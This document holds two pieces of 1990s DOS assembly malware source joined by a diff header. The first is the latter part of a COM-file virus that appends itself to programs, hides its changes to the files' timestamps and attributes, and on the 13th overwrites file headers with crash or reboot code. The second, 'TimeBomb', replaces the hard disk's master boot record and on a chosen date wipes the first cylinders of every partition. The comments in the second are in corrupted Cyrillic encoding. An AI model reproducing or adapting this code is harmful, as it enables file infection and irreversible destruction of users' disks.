;ÛÛ HLT ÛÛ
;ÛÛ HLT ÛÛ
;ÛÛ DB CDh (which is the opcode for INT) ÛÛ
;ÛÛ ÛÛ
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
;ÛÛ will execute the 4 HLT's and then perform an INT-Call depending on ÛÛ
;ÛÛ the byte following CDh. This can be any INT-Call. So this scheme ÛÛ
;ÛÛ can be consisered the dangeroust of all three destruction schemes. ÛÛ
;ÛÛ will terminate at once with returning to DOS. The first five bytes ÛÛ
;ÛÛ of a file will be overwritten always, making the file useless, but ÛÛ
;ÛÛ issuing and 'random' INT-Call can do much more harm. ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Destruction_2:
MOV DX,SI
ADD DX,79H
JMP SHORT Write_5_Destruction_Bytes
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Destruction Scheme 3: Place the following code at the begining of a ÛÛ
;ÛÛ file: INT 19h ÛÛ
;ÛÛ INT 19h ÛÛ
;ÛÛ DB ? (Can be anything. It is the 1st byte of the org.file) ÛÛ
;ÛÛ ÛÛ
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
;ÛÛ will cause a reboot without a memory test and preserving the ÛÛ
;ÛÛ interrupt vectors. If any interrupt vector from 00h through 1Ch has ÛÛ
;ÛÛ been set, the system most likely will hang itself, because of this ÛÛ
;ÛÛ preserving. ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Destruction_3:
MOV DX,SI
ADD DX,7DH
JMP SHORT Write_5_Destruction_Bytes
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Write the 5 bytes with the destruction to the begining of the file ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Write_5_Destruction_Bytes:
MOV AH,40H ;
MOV CX,5 ;
INT 21H ; Write 5 bytes to the file
JMP SHORT Set_FileDate_Time_Back
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ It is not the 13th of the month... Infect the file ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Start_Infecting_File:
MOV AH,3FH ;
MOV CX,3 ; Number of bytes to read
MOV DX,0AH ;
ADD DX,SI ;
INT 21H ; Read the bytes from the file
; and put them at DS:DX
JC Set_FileDate_Time_Back ; If Error Occurred
CMP AL,3 ; 3 Bytes read?
JNE Set_FileDate_Time_Back ; No
MOV AX,4202H ; Set the Read/Write
MOV CX,0 ; pointer to the EOF at
MOV DX,0 ; offset CX:DX (=00:00)
INT 21H ;
MOV CX,AX ; CX=Length of File
SUB AX,3 ;
MOV [SI+0EH],AX ; Store Length -3 bytes
ADD CX,41DH ; CX=CX+41Dh
MOV DI,SI
SUB DI,318H
MOV [DI],CX ; Set new Virus Data Area
; Address into code
MOV AH,40H ;
MOV CX,3ABH ; CX=3ABh The length of the
; viral-code written to disk.
MOV DX,SI
SUB DX,31DH ; DX points at the start of
; the virus code
INT 21H ; Write the viral-code to the
; file
JC Set_FileDate_Time_Back ; If an error occured
CMP AX,3ABH ; 3ABh bytes written?
JNE Set_FileDate_Time_Back ; No
MOV AX,4200H ; Move Read/Write Pointer to
MOV CX,0 ; the beginning of the file
MOV DX,0 ; at offset CX:DX(=00:00)
INT 21H ;
MOV AH,40H ; Write the 1st three new
MOV CX,3 ; bytes to the file. These
MOV DX,SI ; bytes contain the JMP
ADD DX,0DH ; instruction to the virus.
INT 21H ;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set File-Time/Date back ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Set_FileDate_Time_Back:
MOV DX,[SI+6] ; Get File-Date
MOV CX,[SI+4] ; Get File-Time
MOV AX,5701H ; Set back the File-Time and
INT 21H ; Date stamps
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Close the File ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV AH,3EH ;
INT 21H ; Close the File
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set File Attribute back ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Set_FileAttributes_Back:
MOV AX,4301H ;
MOV CX,[SI+8] ; Get File Attribute
MOV DX,26H ;
ADD DX,SI ;
INT 21H ; Set File Attribute
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Restore Org DTA address ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Restore_Org_DTA:
PUSH DS
MOV AH,1AH
MOV DX,[SI] ; Get Original DTA
MOV DS,[SI+2] ; address
INT 21H ; St DTA to ds:dx
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Put 3 Original 1st three bytes in place and execute original program ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
POP DS ; Restore DS
PUSH SI ; Store SI
CLD ;
ADD SI,81H ; Address where the 1st three
; bytes can be found.
MOV DI,100H ; Destination Address
MOV CX,3 ; Number of bytes to move
REP MOVSB ; Move the bytes
POP SI ; Restore SI
POP CX ; Restore CX
XOR AX,AX ; Zero register
XOR BX,BX ; Zero register
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
MOV DI,100H
PUSH DI ; Store DI
XOR DI,DI ; Zero register
RET 0FFFFH ; Terminate Virus-Code and
; execute original program.
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Virus Data Area ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
ORG_DTA_ADD: DW ? ; Storing place for BX of
; original DTA
DW ? ; Storing place for ES of
; original DTA
File_Time: DW ? ; Storing place for the
; filetime of the file
Date: DW ? ; Storing place for the
; filedate
Attrib: DW ? ; Storing place for the
; file attributes.
Three_Bytes: DB 0E9h, 27h, 03h
First_New_Byte: DB 0E9h ; First new byte of the
; the infected file. This is
; the jump instruction.
Length_Min_3: DB 0Dh, 27h ; Also new address to jump
; to for the virus on exe-
; cution, 2nd and 3rd new byte
Search_Spec: DB '*.COM',00h
Path_Add_Org: DW 00,05
Path_Add_Vir: DW '6M'
DB 'PATH=', 00, 00
Destruc_Code_1: DB 0B4h, 0h, 0CDh, 20h, 90h
File_Path: DB 'VIRCOM.COM' ; Filename including PATH
DB 30 DUP(0)
New_DTA:
DB 02
DB '????????COM'
DB 03, 11H
DB 7 DUP (0)
DB 20H, 80H, 12H, 17H, 15H, 10H
DB 27H, 0, 0
FileName: DB 'VIRCOM.COM', 00h, 00h, 00h
Destruc_Code_2: DB 0F4H, 0F4H, 0F4H, 0F4H
Destruc_Code_3: DB 0CDH, 19H, 0CDH, 19H, 0E9H
First_3_Bytes: DB 0E9h, 45h, 45h
Notice: DB '(C) Monxla'
Time ENDP
SEG_A ENDS
END START


@ -0,0 +1,472 @@
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; (C) ANS (Armourer) TimeBomb Ver 1.00 25 Jun
; FIDOnet 2:461/29.444 FreeWare, SourceWare 1995
;
;
; <20>®«­®áâìî § ¬¥­ï¥â MBR. <20>® ¤®á⨦¥­¨¨ ®¯à¥¤¥«¥­­®© ¤ âë ä â «ì­® £à®å ¥â ¢¨­â
;
; ‘â àë© MBR § ¯¨á뢠¥âáï ¢ ä ©« c:\mbr.bak, çâ®¡ë ¬®¦­® ¡ë«® ¢®ááâ ­®¢¨âì,
; ¥á«¨ çâ®. “¯à ¢«¥­¨ï áâ àë© MBR ­¥ ¯®«ãç ¥â, â ª çâ® ¥á«¨ ®­ ¤¥« « çâ®-â®
; ¡®«¥¥ 㬭®¥, ­¥¦¥«¨ § £à㧪  á¨á⥬ë á  ªâ¨¢­®£® à §¤¥«  - TimeBomb ¯à¨¤¥âáï
; ¯¥à¥¤¥« âì.
;
; <20>ਠáà ¡ â뢠­¨¨ TimeBomb § â¨à îâáï ¯¥à¢ë¥ 4 樫¨­¤à  ª ¦¤®£® à §¤¥«  ­ 
; ¢¨­â¥, ¢ª«îç ï «®£¨ç¥áª¨¥ ¤¨áª¨ DOS (extended partition)
;
; ‘«¥¤ã¥â § ¬¥â¨âì, çâ® Non-DOS à §¤¥«ë (HPFS, ­ ¯à¨¬¥à) ¯à¨ í⮬ ¯®áâà ¤ îâ
; ­¥§­ ç¨â¥«ì­® - ¢ á¢ï§¨ á ª®à¥­­ë¬ ®â«¨ç¨¥¬ ¨å áâàãªâãàë ®â DOS FAT.
;
killed_cyl = 4 ; —¨á«® 㡨¢ ¥¬ëå 樫¨­¤à®¢ ¢ ª ¦¤®¬ à §¤¥«¥
xor_value = 73h ; ‡­ ç¥­¨¥ § è¨ä஢ ­¨ï ‚ è¥£® ¯®á«¥¤­¥£® á«®¢  ;-)
locals
cseg segment
assume cs:cseg
org 100h
.286
start proc near
;
; ˆ­áâ ««ïæ¨ï
;
; <20>஢¥à塞 ª®¬ ­¤­ãî áâபã
mov si, 80h
mov bl, byte ptr [si]
xor bh, bh
cmp bl, 8
jnc @@checkdate
help:
; ª®¬ ­¤­®© áâப¥ ­¥ 㪠§ ­  ¤ â  - ¢ë¢®¤¨¬ ¯®¤áª §ªã
mov dx, offset @@title
mov ah, 9
int 21h
int 20h
; <20>®«ã祭¨¥ BCD-ç¨á«  ¨§ ª®¬. áâப¨
getBCD proc near
dec si
mov ax, word ptr [si+bx] ; <20>¥à¥¬ ¯®á«¥¤­¨¥ ¤¢¥ æ¨äàë
sub ax, '00' ; ASCII -> BIN
xchg al, ah
db 0d5h, 10h ; AAD á ¬®¤¨ä¨ª â®à®¬ 16
cmp al, 9ah
jnc help
dec si ; ‘ࠧ㠯¥à¥å®¤¨¬ ª á«¥¤ãî饬㠯®«î
dec si
retn
getBCD endp
@@checkdate: ; <20>஢¥à塞 ¤ âã (á­ ç «  £®¤, § â¥¬ ¬¥áïæ, § â¥¬ ç¨á«®)
; ¨ ¯à¨¢®¤¨¬ ¥¥ ª ­ã¦­®¬ã ä®à¬ âã
; Š®à४⭮áâì ¤ âë ­¥ ¯à®¢¥à塞 - ¦â® ¯à®¡«¥¬  ¯®«ì§®¢ â¥«ï -
; çâ® ®­ â ¬ ¢¢¥«
call getBCD ; <20>¥à¥¬ æ¨äàë £®¤ 
mov byte ptr year, al ; <20>®«ã稫¨ BCD-year
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
jne help
call getBCD ; <20>¥à¥¬ æ¨äàë ¬¥áïæ 
mov byte ptr month, al ; <20>®«ã稫¨ BCD-month
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
jne help
call getBCD ; <20>¥à¥¬ æ¨äàë ¤­ï
mov byte ptr day, al ; <20>®«ã稫¨ BCD-day
@@singledisk:
;
; ‡ ¬¥­ï¥¬ MBR ¢¨­â  ᢮¨¬ ª®¤®¬ ¨§ bomb proc
;
; —¨â ¥¬ áâ àë© MBR, á®å࠭塞 ¥£® ¢ c:\mbr.bak, ¯¨è¥¬ ᥡï
;
; —¨â ¥¬ MBR
mov cx, 1
mov dx, 80h
mov ax, 201h
mov bx, offset buffer
int 13h
jnc @@rd_ok
mov dx, offset @@rd_err
@@err_exit: ; ‚뢮¤ á®®¡é¥­¨ï ¨§ DX ¨ ¢ë«¥â ¯® ®è¨¡ª¥
mov ah, 9
int 21h
retn
@@rd_ok:
; ‘®§¤ ¥¬ ä ©«
mov dx, offset @@fname
xor cx, cx
mov ah, 3ch
int 21h
jnc @@cr_ok
mov dx, offset @@cr_err
jmp @@err_exit
@@cr_ok:
; <20>¨è¥¬ ¢ ä ©«
mov bx, ax
mov cx, 512
mov dx, offset buffer
mov ah, 40h
int 21h
jnc @@wr_ok
mov dx, offset @@wr_err
jmp @@err_exit
@@wr_ok:
; ‡ ªà뢠¥¬ ä ©«
mov ah, 3eh
int 21h
;
; <20>¥à¥­®á¨¬ ᢮© MBR ­  ¬¥áâ® áâ à®£®
;
mov si, offset bomb
mov di, offset buffer
mov bx, di
mov cx, di
sub cx, si
cld
rep movsb
;
; ‡ ¯¨á뢠¥¬ ­®¢ë© MBR ¯®¢¥àå áâ à®£®
;
mov cx, 1
mov dx, 80h
mov ax, 301h
int 13h
mov dx, offset @@mbr_wr_err
jc @@err_exit
mov dx, offset @@done_msg
jmp @@err_exit
; ‘®®¡é¥­¨ï ®¡ ®è¨¡ª å
@@rd_err: db 'Error read the MBR of C:',13,10,'$'
@@cr_err: db 'Error creating the '
@@fname: db 'C:\MBR.BAK',0,'file',13,10,'$'
@@wr_err: db 'Error writing backup file',13,10,'$'
@@mbr_wr_err: db 'Error writing new MBR',13,10,'$'
@@done_msg: db 'Your MBR replaced by TimeBomb',13,10,'$'
; ‡ áâ ¢ª 
@@title:
db 13,10,10
db '(C) Armourer TimeBomb Ver 1.00 25 Jun 1995',13,10,10
db ' Usage: timebomb <date>',13,10,10
db ' Where <date> is a fatal date for your computer.',13,10
db ' Date format must be in exUSSR standard: DD.MM.YY',13,10,10
db 'Good Luck ;)',13,10,'$'
start endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; ’¥ªáâ ¡®¬¡ë. Š®¬¡¨­¨àã¥âáï á MBR (®â MBR ¡¥à¥âáï ¯ àâ¨è­)
;
; <20>â®â ª®¤ ¡ã¤¥â áâ à⮢ âì á  ¤à¥á  0:7c00h
;
bomb proc near
; <20> áâà ¨¢ ¥¬ á⥪ ¨ ¯¥à¥­®á¨¬ MBR, ªã¤  ­ ¤® (0:600h)
cli
mov ax, cs
mov ss, ax
mov ds, ax
mov es, ax
mov si, 7c00h
mov sp, si
push si ; <20>â® ­ã¦­® ¤«ï ¯®á«¥¤ãî饣® áâ àâ  boot' 
cld
mov cx, 1beh / 2 ; <20>®á«¥ â ª®£® ¯¥à¥­®á  SI ¡ã¤¥â 㪠§ë¢ âì
mov di, 600h ; ­  ¯ àâ¨è­
rep movsw
push ax ; ‘¥£¬¥­â
push offset beginbomb - offset bomb + 600h ; ‘¬¥é¥­¨¥
retf
beginbomb:
; <20>஢¥à塞 ¢à¥¬ï
mov ah, 4
int 1ah ; <20>à®ç«¨ ¤ âã ¢ CX:DX
jc @@skipbomb ; …᫨ ç áë ­¥ à ¡®â îâ -> ¯à®¯ã᪠¥¬ ¯à®¢¥àªã
year = $ + 2
cmp cl, 12h ; <20>஢¥à塞 £®¤
jc @@skipbomb ; ƒ®¤ ­¥ ᮢ¯ « ;)
jne @@explode ; …᫨ íâ®â £®¤ ¯à®è¥« - ¢§à뢠¥¬áï ­¬¥¤«¥­­®
month = $ + 3
day = $ + 2
cmp dx, 1234h ; ˆ¬¥­­® â ª, çâ®¡ë ­¥ ᣥ­¥à¨à®¢ «áï
; ª®à®âª¨© ¢ à¨ ­â ¤«ï CMP
jc @@skipbomb ; <20>¥ ᮢ¯ « ¤¥­ì ¨ ¬¥áïæ
@@explode:
;
; ‚ᥠᮢ¯ «®, ¯à¨è«  ç¥à­ ï ¯®à ...
;
; ‘â¨à ¥¬ ¯¥à¢ë¥ 樫¨­¤àë ª ¦¤®£® à §¤¥«  (¢ª«îç ï «®£¨ç¥áª¨¥
; ¤¨áª¨ DOS)
;
; “áâ ­ ¢«¨¢ ¥¬ ¢ ª®¤¥ ¡®¬¡ë ¯ à ¬¥âàë ¢¨­â 
mov dl, 80h
call destroy
; “áâ ­ ¢«¨¢ ¥¬ ¯ à ¬¥âàë  â®à®£® ¢¨­â , ¥á«¨ ®­ ¥áâì
ror dl, 1 ; …᫨ ®¤¨­ ¤¨áª, ä« £ CF ¡ã¤¥â ãáâ ­®¢«¥­
jc @@singledisk
mov dl, 81h
call destroy
@@singledisk:
jmp @@incorrect ; ‚뢮¤¨¬ á®®¡é¥­¨¥ "Missing operating ssytem"
@@skipbomb:
;
; Žâà ¡®âª  ­®à¬ «ì­®£® ª®¤  MBR
;
; ˆé¥¬ § £à㧮ç­ë© à §¤¥«
mov cl, 4 ; …áâì ¢á¥£® 4 ¢ à¨ ­â  ...
@@searchboot: ; –¨ª« ¯®¨áª 
mov dx, word ptr [si] ; ‘ࠧ㠧 £à㦠¥¬ ¢ DX â®, çâ® ­ã¦­®
cmp dl, 80h ; <20>â®â à §¤¥« § £à㧮ç­ë© ?
je @@boot
add si, 10h ; <20>¥à¥å®¤¨¬ ª á«¥¤ãî饩 § ¯¨á¨
loop @@searchboot
; <20>¥ ­ è«¨ - ¢ë¤ ¥¬ á®®¡é¥­¨¥
@@incorrect:
call errmsg
db 'Missing operating system',0
@@boot: ; ‡ £à㦠¥¬ boot-ᥪâ®à ¨ ¯¥à¥¤ ¥¬ ¥¬ã ã¯à ¢«¥­¨¥
mov cx, word ptr [si+2] ; —â® ­ ¤® - ¢ CX
mov ax, 201h ; —¨â ¥¬ 1 ᥪâ®à
pop bx ; <20>®  ¤à¥áã 0:7c00h
push bx
int 13h
jnc @@exit
call errmsg
db 'Error reading operating system',0
@@exit:
cmp word ptr [bx + 510], 0aa55h
jne @@incorrect
retn ; ‡ ¯ã᪠¥¬ boot
;
; <09>®¤¯à®£à ¬¬ë
;
; ‚ë¤ ç  á®®¡é¥­¨ï ®¡ ®è¨¡ª¥
errmsg proc near
sti
cld
pop si
mov ah, 0eh
@@nextchar:
lodsb
or al, al
je $
int 10h
jmp @@nextchar
errmsg endp
; Ž¡å®¤ ¢á¥å à §¤¥«®¢ ¤¨áª  á § ¯¨áìî ¨å ¯ à ¬¥â஢ ¢ ¡ãä¥à
getpart proc near
; <20>⮠४ãàᨢ­ ï äã­ªæ¨ï.
; <20>  ¢å®¤¥ ¢ SI âॡã¥âáï 㪠§ â¥«ì ­  ®ç¥à¥¤­®© à §¤¥«
; ¡ãä¥à ¯®  ¤à¥áã ES:DI ¯¨èãâáï ¯ à ¬¥âàë ⥪.à §¤¥« 
mov cx, 4 ; ‘ç¥â稪 à §¤¥«®¢ ¢ ª ¦¤®¬ MBR
@@nextpart:
; <20>஢¥à塞 ⨯ à §¤¥« 
cmp byte ptr [si+4], 0 ; <20>¥¨á¯®«ì§ã¥¬ë© à §¤¥«
je @@exit
; <20>¨è¥¬ ¢ ¡ãä¥à ¯ à ¬¥âàë à §¤¥« 
mov ax, word ptr [si] ; ƒ®«®¢ 
stosw
mov dx, ax ; ƒ®â®¢¨¬áï ª® ¢å®¤ã ¢ ४ãàá¨î
disk1 = $ + 1
mov dl, 80h ; <20>®¬¥à ®¡à ¡ â뢠¥¬®£® ¤¨áª 
mov ax, word ptr [si+2]
stosw ; –¨«¨­¤à/ᥪâ®à
; ‘­®¢  ¯à®¢¥à塞 ⨯ à §¤¥«  - ­¥ à áè¨à¥­­ë© «¨ ®­ ?
cmp byte ptr [si+4], 5
jne @@exit ; <20>¥â - ¨¤¥¬ ¤ «ìè¥
; <20>ëà塞 ¢ ४ãàá¨î
; —¨â ¥¬ MBR à áè¨à¥­­®£® à §¤¥« 
push cx ; ‘®å࠭塞 áç¥â稪
push si ; ‘®å࠭塞 㪠§ â¥«ì ­  à §¤¥«ë
add bx, 512 ; <20>த¢¨£ ¥¬ 㪠§ â¥«ì ­  ¡ãä¥à
mov cx, ax ; ‘¥©ç á CX:DX 㪠§ë¢ îâ ­  MBR
mov ax, 201h ; à áè¨à¥­­®£® à §¤¥« 
int 13h ; —¨â ¥¬ à áè¨à¥­­ë© à §¤¥« ¢ 0:BX
jnc @@rec ; <20>஢¥àª  ­  ª®à४⭮áâì
; ‚ë室¨¬ ¨§ ४ãàᨨ ¢ á«ãç ¥ á¡®ï
pop si
pop cx
sub bx, 512
jmp @@exit
@@rec:
mov si, bx ; “áâ ­ ¢«¨¢ ¥¬ 㪠§ â¥«ì
add si, 1beh ; ­  â ¡«¨æã à §¤¥«®¢
call getpart
@@exit:
add si, 10h
loop @@nextpart
; ‚ë室 ¨§ ४ãàᨨ
sub bx, 512
pop dx
pop si
pop cx
push dx
retn
getpart endp
; “­¨ç⮦¥­¨¥ ᮤ¥à¦¨¬®£® ⥪ã饣® ¤¨áª 
destroy proc near
; <20>®«ãç ¥¬ ¯ à ¬¥âàë ¢¨­â , 㪠§ ­­®£® ¢ DL
mov byte ptr ds:[offset disk - offset bomb + 600h], dl
mov byte ptr ds:[offset disk1 - offset bomb + 600h], dl
mov ah, 8
int 13h
mov byte ptr ds:[heads - offset bomb + 600h], dh
and cl, 63
mov byte ptr ds:[sectors - offset bomb + 600h], cl
push dx
mov bx, 0a00h ; <20>ãä¥à ¤«ï ç⥭¨ï MBR à áè¨à¥­­ëå à §¤¥«®¢
; <20>® 室㠤¥«  ª BX ¡ã¤¥â ¯à¨¡ ¢«ïâìáï ¯® 512 -
; â ª çâ® ¬ ªá¨¬ «ì­ë© ã஢¥­ì ¢«®¦¥­­®áâ¨
; á®áâ ¢¨â 57 à §¤¥«®¢
mov di, 500h ; <20>ãä¥à ¯®¤ ¯ à ¬¥âàë ¤«ï int 13h (64 ¤¨áª )
; <20>¥ªãàᨢ­® ®¡å®¤¨¬ «®£¨ç¥áª¨¥ ¤¨áª¨, § ¯¨áë¢ ï ¢ ¡ãä¥à ¯ à ¬¥âàë
; ¤«ï int 13h
push si ; Š®à४â­ë© ¢å®¤ ¢ ४ãàá¨î
push cx
xor ax, ax ; “áâ ­®¢ª  ¤«ï áâ¨à ­¨ï £« ¢­®£® MBR
stosw
inc ax
stosw
call getpart ; Ž¡å®¤ à §¤¥«®¢
; ‘®§¤ ¥¬ §­ ç¥­¨¥ ¯à®¯¨á뢠­¨ï
; ‘¥©ç á ¢ bx «¥¦¨â ¤«¨­  ¯à®¯¨á뢠¥¬ëå ¤ ­­ëå ¢ ¯ à £à ä å - 800h
push di ; ‘®å࠭塞 㪠§ â¥«ì ­  墮áâ ᯨ᪠ ¯ à ¬¥â஢
mov di, bx ; DI ¡ã¤¥â 㪠§ â¥«ì ­  ¡ãä¥à ¤«ï ¤ ­­ëå
shl di, 4 ; <20>ãä¥à ¡ã¤¥â à á¯®« £ âìáï ᮠᬥ饭¨ï 8000h
push di ; ‘®å࠭塞  ¤à¥á ¡ãä¥à  § ¯®«­¥­¨ï
@@nextword:
mov si, offset lmd - offset bomb + 600h
mov cx, 16
@@nextchar:
lodsb
xor al, xor_value
stosb
loop @@nextchar
dec bx
jne @@nextword
; ˆ¤¥¬ ­ § ¤ ¯® ¡ãä¥àã
pop bx ; ‚®ááâ ­ ¢«¨¢ ¥¬  ¤à¥á ¡ãä¥à 
pop si ; ‚®ááâ ­ ¢«¨¢ ¥¬ 㪠§ â¥«ì ­  ¯ à ¬¥âàë
mov cx, si ; ‚ëç¨á«ï¥¬ ç¨á«® § â¨à ¥¬ëå à §¤¥«®¢
sub cx, 500h
shr cx, 2
std
lodsw ; <20>¥à¥å®¤¨¬ ª ¯®á«¥¤­¥© § ¯¨á¨ ¢ ¡ãä¥à¥
@@nextpart:
push cx ; ‘®å࠭塞 áç¥â稪
lodsw ; <20>¥à¥¬ ¯ à ¬¥âàë à §¤¥« 
mov cx, ax ; –¨«¨­¤à/ᥪâ®à
lodsw
mov dx, ax ; ƒ®«®¢ 
disk = $ + 1
mov dl, 80h ; <20>®¬¥à § â¨à ¥¬®£® ¤¨áª 
mov si, killed_cyl ; ‘ç¥â稪 㡨¢ ¥¬ëå 樫¨­¤à®¢
; <20>ய¨á뢠¥¬ à §¤¥«
@@nexthead:
sectors = $ + 1
mov ax, 310h ; !!!!
int 13h
inc dh ; ‘«¥¤ãîé ï £®«®¢ 
heads = $ + 2
cmp dh, 16 ; ‚¥áì 樫¨­¤à ?
jne @@nexthead
add cx, 64 ; ‘«¥¤ãî騩 樫¨­¤à
xor dh, dh ; <20> ç¨­ ¥¬ á ­ã«¥¢®© £®«®¢ë
dec si
jne @@nexthead
pop cx ; ‚®ááâ ­ ¢«¨¢ ¥¬ áç¥â稪
loop @@nextpart ; ¨ ªàã⨬ 横« ¯® à §¤¥« ¬
pop dx
retn
destroy endp
lmd:
irpc ch, <LAMERS MUST DIE.>
db '&ch' xor xor_value
endm
bomb endp
buffer: ; ‘ ¡ã¤¥¬ ç¨â âì áâ àë© mbr
dw offset buffer - offset bomb
cseg ends
end start
